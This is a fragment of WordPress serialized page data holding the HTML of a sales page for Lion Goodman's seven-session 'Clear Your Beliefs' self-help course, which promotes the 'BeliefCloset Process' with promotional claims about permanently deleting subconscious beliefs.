unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60695:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n \n\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n \n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n \n\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n \n\n&nbsp;\n\n\n\n\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div 